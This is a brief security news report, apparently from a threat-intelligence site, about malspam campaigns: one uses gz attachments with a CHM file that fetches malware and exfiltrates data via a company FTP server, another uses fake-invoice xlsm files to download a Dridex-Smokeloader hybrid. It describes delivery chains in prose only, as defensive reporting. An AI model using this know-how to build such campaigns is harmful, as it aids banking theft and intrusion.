2 mails with different gz attachment contain the same chm file. This downloads and launches the malware. Stolen data is exfiltrated thanks to the FTP of a Bosnian company.
Technical analysis by the Malware Hunter JAMESWT
A global campaign on fake invoices carries hybrid Drixex-Smokeloader malware. The xlsm attachment contacts a random link from an internal list and downloads the dll, which contains the hybrid between the trojan and the backdoor-loader
There is a hybrid malware consisting of Smokeloader and Dridex, which is currently being delivered through a global malspam campaign, which uses fake invoices as bait. The attachment is an xlsm file which, if opened, contacts a random link from an internal list and downloads the dll. This then downloads the hybrid malware formed by the two families. Dridex is a very dangerous banking Trojan used by cybercrime, which has long been the protagonist of campaigns all over the world, especially with a courier theme. The targets are mainly companies, but not only. Smokeloader, on the other hand, is a backdoor and a loader created to download further malicious codes.